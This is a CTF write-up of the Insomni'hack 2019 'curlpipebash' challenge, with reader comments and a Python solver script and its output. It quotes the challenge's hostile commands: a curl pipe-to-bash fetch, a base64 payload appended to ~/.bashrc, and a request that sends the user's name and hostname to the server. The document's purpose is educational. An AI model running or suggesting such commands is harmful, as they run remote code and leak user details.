Tags: bash curl
Rating: 4.3
# curlpipebash
```
Welcome to Insomni'hack teaser 2019!
Execute this Bash command to print the flag :)
> curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
```
The request to `https://curlpipebash.teaser.insomnihack.ch/print-flag.sh` gives us a streamed, chunked response. That means that it will send us commands that will be executed, while itself staying alive.
This allows the server to send us different replies, depending on what endpoints we hit.
## Request flow
We start the streamed, chunked response by running
```
curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
```
print-flag.sh replies with a new curl command that contains an UUID.
```
curl -Ns https://curlpipebash.teaser.insomnihack.ch/UUID | bash
```
When that command is executed, print-flag.sh gives us two new commands:
```
base64 -d >> ~/.bashrc <<< ZXhwb3J0IFBST01QVF9DT01NQU5EPSdlY2hvIFRIQU5LIFlPVSBGT1IgUExBWUlORyBJTlNPTU5JSEFDSyBURUFTRVIgMjAxOScK
```
The base64 string is `export PROMPT_COMMAND='echo THANK YOU FOR PLAYING INSOMNIHACK TEASER 2019'`
```
curl -Ns https://curlpipebash.teaser.insomnihack.ch/UUID/add-to-wall-of-shame/$(whoami)%40$(hostname)
```
Once these are executed, print-flag.sh gives us the final command:
```
echo "Welcome to the wall of shame"
```
and finishes.
## Solution
To solve, just send the same requests while keeping the `print-flag.sh` alive, and omit the `add-to-wall-of-shame` call.
[Complete solution and "exploit" code available here](https://github.com/EdwardPwnden/ctf-2019/tree/master/Insomnihack_Teaser/curlpipebash)
I run your exploit code but after the request with UUID be executed, I didn't receive any new command.
Output:
print-flag got line: b'curl -Ns https://curlpipebash.teaser.insomnihack.ch/28742838-bc89-4e31-8d14-f4c49ae7c303 | bash'
Requesting new url: b'https://curlpipebash.teaser.insomnihack.ch/28742838-bc89-4e31-8d14-f4c49ae7c303'
I can't run the script locally either. But it works on https://repl.it/.
---------------------------------------------------------------------------------------
# modify the script to support py3
import requests
headers = {
"User-Agent": "curl/7.61.0" # if it looks like curl and talks like curl...
}
def main():
url = "https://curlpipebash.teaser.insomnihack.ch/print-flag.sh"
r = requests.get(url, headers=headers, stream=True)
for l in r.iter_lines():
print("print-flag got line: {}".format(l))
if b"curl" in l and b"shame" not in l: # We want to curl all new urls, but not the wall of shame one!
new_link = l.split(b" ")[2] # who needs regex?..
print("Requesting new url: {}".format(new_link))
requests.get(new_link, headers=headers)
if __name__ == "__main__":
main()
--------------------------------------------------------------------
Python 3.6.1 (default, Dec 2015, 13:05:11)
[GCC 4.8.2] on linux
print-flag got line: b'curl -Ns https://curlpipebash.teaser.insomnihack.ch/66aafadc-4636-4405-a2d1-8d11f35dd7c4 | bash'
Requesting new url: b'https://curlpipebash.teaser.insomnihack.ch/66aafadc-4636-4405-a2d1-8d11f35dd7c4'
print-flag got line: b'base64 -d >> ~/.bashrc <<< ZXhwb3J0IFBST01QVF9DT01NQU5EPSdlY2hvIFRIQU5LIFlPVSBGT1IgUExBWUlORyBJTlNPTU5JSEFDSyBURUFTRVIgMjAxOScK'
print-flag got line: b'curl -Ns https://curlpipebash.teaser.insomnihack.ch/66aafadc-4636-4405-a2d1-8d11f35dd7c4/add-to-wall-of-shame/$(whoami)%40$(hostname)'
print-flag got line: b'INS{Miss me with that fishy pipe}'
I can't receive any commands by running the modified script above.
Apparently the result of "requests.get(new_link, headers=headers)" seems to be empty.
Unable to understand
I don't know why I can't accept the result every time I request uuid url.
@y12uN Thanks for your reply :) So the problem is about Network Address Translation, right?
